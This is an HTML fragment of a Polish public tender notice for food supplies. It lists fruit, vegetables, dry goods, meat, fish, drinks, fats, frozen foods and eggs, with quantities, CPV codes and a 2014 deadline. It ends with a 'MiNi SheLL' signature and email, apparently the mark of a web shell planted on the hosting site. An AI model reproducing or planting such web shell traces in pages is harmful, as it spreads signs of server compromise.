<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa III - owoce i warzywa OWOCE 1. Arbuz - 200 kg, 2. Banan - 1500 kg, 3. Brzoskwinia - 75 kg, 4. Cytryna - 100 kg, 5. Jabłka - 3000 kg, 6. Kiwi - 1200 szt., 7. Truskawki św. - 120 kg, 8. Mandarynka - 400 kg, 9. Śliwka sezonowa - 20 kg, 10 Morela - 40 kg, 11 Pomarańcza - 1000 kg 12 Nektaryna - 300 kg, 13 Winogrono - 100 kg, 14 Szarlotka jabłka - słoik 0,9 litra - 70 szt. WARZYWA 1. Burak czerwony - 1100 kg, 2. Cebula - 340 kg, 3. Botwina - 40 pęcz., 4. Brukselka - 5 kg, 5. Fasola sucha łuskana - 20 kg, 6. Groch suchy łuskany - 50 kg, 7. Kapusta biała - 60 kg, 8. Kapusta młoda - 40 kg, 9. Kapusta pekińska - 350 kg, 10 Kapusta czerwona - 140 kg, 11 Kapusta kiszona - 380 kg, 12. Koper zielony - 750 pęcz., 13. Kalafior świeży - 200 szt., 14 Ogórek świeży - 400 kg, 15. Kapusta włoska - 20 szt., 16. Marchew - 2000 kg, 17. Natka pietruszki - 1100 pęcz., 18. Ogórek kiszony - 320 kg, 19. Szczaw - 30 pęcz., 20. Papryka świeża - 120 kg, 21. Cukinia - 10 kg, 22. Por - 130 kg, 23 Pietruszka - 400 kg, 24. Pomidor świeży - 500 kg, 25. Rzodkiewka - 650 pęcz., 26 Rzodkiew biała - 80 kg, 27. Seler - 550 kg, 28 Szczypior - 650 pęcz., 29 Sałata zielona lodowa - 280 szt., 30 Ziemniaki - 13500 kg, 33 Kiełki brokuła - 5 kg, 34 Kiełki rzodkiewki - 5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa IV - produkty suche.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa IV - produkty suche 1. Cukier 1 kg - 1200 kg 2. Cukier puder 0,5 kg - 6 szt. 3. Cukier waniliowy 32 g - 550 szt. 4. Barszcz biały Winiary lub równoważny torebka 0,066kg - 500 szt. 5. Bazylia 0,01kg - 20 szt. 6. Herbatniki be be co najmniej 16g. lub równoważne - 2000 szt. 7. Biszkopty petit 0,012 kg lub równoważne - 250 szt. 8. Brzoskwinia puszka co najmniej 2,6 kg - 12 szt. 9 Brzoskwinia puszka co najmniej 0,560 kg - 140 szt. 10 Deser bobovita 0,125kg lub równoważny - 800 szt. 11 Deser gerber 0,125kg lub równoważny - 50 szt. 12 Dynia łuskana 0,10kg - 160 szt. 13 Dżem Łowicz 0,28kg lub równoważny - 240 szt. 14 Herbata saga 100 torebek lub równoważna - 100 szt. 15 Herbata owocowa ekoland 0,3kg lub równoważna - 100 szt. 16 Herbata Rooibos 25 torebek, 0,037kg lub równoważna - 30 szt. 17 Herbatka Hipp 0,2 kg lub równoważna - 15 szt. 18 Kakao co najmniej 150g - 90 szt. 19 Kawa Inka co najmniej 150g lub równoważna - 150 szt. 20 Kisiel cytrynowy z cukrem 0,077kg - 1800 szt. 21 Koncentrat pomidorowy co najmniej 1kg - 160 szt. 22 Koncentrat pomidorowy co najmniej 200g - 60 szt. 23 Kukurydza puszka Bonduelle co najmniej 400g lub równoważna - 180 szt. 24 Kwasek cytrynowy 0,020kg - 140 szt. 25 Liść laurowy Appetita 0,010 kg lub równoważna - 20 szt. 26 Lubisie herbatniki 0,03kg lub równoważne - 1700 szt. 27 Majeranek 0,010kg - 40 szt. 28 Majonez Rzymski co najmniej 1kg - 45 szt. 29 Herbata miętowa 0,08kg - 12 szt. 30 Miód co najmniej 400g - 160 szt. 31 Morela suszona co najmniej 100g. - 40 szt. 32 Oregano 0,010kg - 20 szt. 33 Orzechy laskowe co najmniej 100g - 20 szt. 34 Papryka słodka mielona 0,010kg - 300 szt. 35 Pieprz mielony 0,010kg - 200 szt. 36 Pieprz cytrynowy 0,010kg - 40 szt. 37 Rodzynki co najmniej 200g - 200 szt. 38 Ryż biały - 100 kg, 39 Ryż saszetki Sonko lub równoważny 0,4kg - 280 szt. 40 Sezam - 8 kg, 41 Sezamki 0,03kg - 500 szt. 42 Skrobia ziemniaczana co najmniej 0,5kg - 10 szt. 43 Słonecznik łuskany co najmniej 100g - 250 szt. 44 Soczewica czerwona - 10 kg, 45 Sól 1kg - 200 kg, 46 Tymianek 0,010kg - 15 szt. 47 Wafle ryżowe Sonko co najmniej 120g lub równoważne - 600 szt. 48 Ziele angielskie 0,010kg - 20 szt. 49 Zioła prowansalskie 0,010kg - 15 szt. 50 Żurawina suszona 1kg - 60 kg, 51 Żurek butelka 0,5 litra - 80 szt. 52 Żurek Winiary w torebce 0,066kg lub równoważny - 100 szt. 53 Pasztet profi firmowy co najmniej 130g lub równoważny - 1300 szt. 54 Groszek konserwowy co najmniej 400g - 150 szt. 55 Ketchup kotlin łagodny 450g. lub równoważny - 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa V - mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa V - mięso i wędliny 1. Łopatka b/k - 980 kg, 2. Szynka b/k - 200 kg, 3. Schab b/k - 350 kg, 4. Kurczak - 250 kg, 5. Filet z kurczaka bez skóry - 500 kg, 6. Korpus - 750 kg, 7. Filet z indyka - 150 kg, 8. Pałki drobiowe - 300 kg, 9. Kiełbasa Krakowska drobiowa - 80 kg, 10. Kurczak gotowany/wędlina - 30 kg, 11. Kiełbasa podwawelska - 15 kg, 12 Parówki cielęce - 400 kg, 13 Polędwica drobiowa - 60 kg, 14 Szynka z wędzarni - 60 kg, 15 Szynka łezka - 60 kg, 16 Baton drobiowy - 20 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Grupa VI - ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa VI - ryby 1. Makrela wędzona - 180 kg, 2. Morszczuk filet b/skóry - 280 kg, 3. Miruna ze skórą filet - 500 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupa VII - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa VII - napoje 1. Woda żywiec niegazowana 1,5 L lub równoważna - 1000 litr, 2. Woda żywiec dziubek 0,33L lub równoważna - 1000 szt. 3. Sok multiwitamina Hortex 1 litr lub równoważna - 300 litr, 4. Sok bobofrut 300ml lub równoważny - 500 szt. 5. Sok pomarańczowy 100% - 1litr - 100 litr, 6. Soczki Leon Hortex 200ml lub równoważne - 2500 szt. 7. Syrop Herbapol 420ml lub równoważny - 50 szt. 8. Sok Kubuś pomarańczowy 0,33l lub równoważny - 120 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Grupa VIII - tłuszcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa VIII - tłuszcze 1. Olej kujawski 1L lub równoważny - 450 szt. 2. Masło Extra co najmniej 200g - 2800 szt. 3. Oliwa z oliwek extra vergine co najmniej 250ml - 12 szt. 4. Oliwa z oliwek extra vergine co najmniej 0,5L - 20 szt. 5. Oliwa z oliwek extra vergine co najmniej 1L - 25 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Grupa IX - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa IX - mrożonki 1. Brokuł - 180 kg, 2. Brukselka - 14 kg, 3. Bukiet warzyw (brokuł, marchew, kalafior) - 100 kg, 4. Fasolka szparagowa cięta żółta - 60 kg, Fasolka szparagowa cięta zielona - 200 kg, 5. Kalafior - 130 kg, 6. Malina - 180 kg, 7. Truskawka - 500 kg, 8. Marchew z groszkiem - 30 kg, 9. Marchew kostka - 60 kg, 10. Mieszanka kompotowa z czarną porzeczką - 450 kg, 11. Mieszanka kompotowa bez śliwki - 200 kg, 12 Czarna porzeczka - 320 kg, 13 Wiśnia - 20 kg, 14 Włoszczyzna paski - 20 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Grupa X - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa X - jaja 1. jaja - 10000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com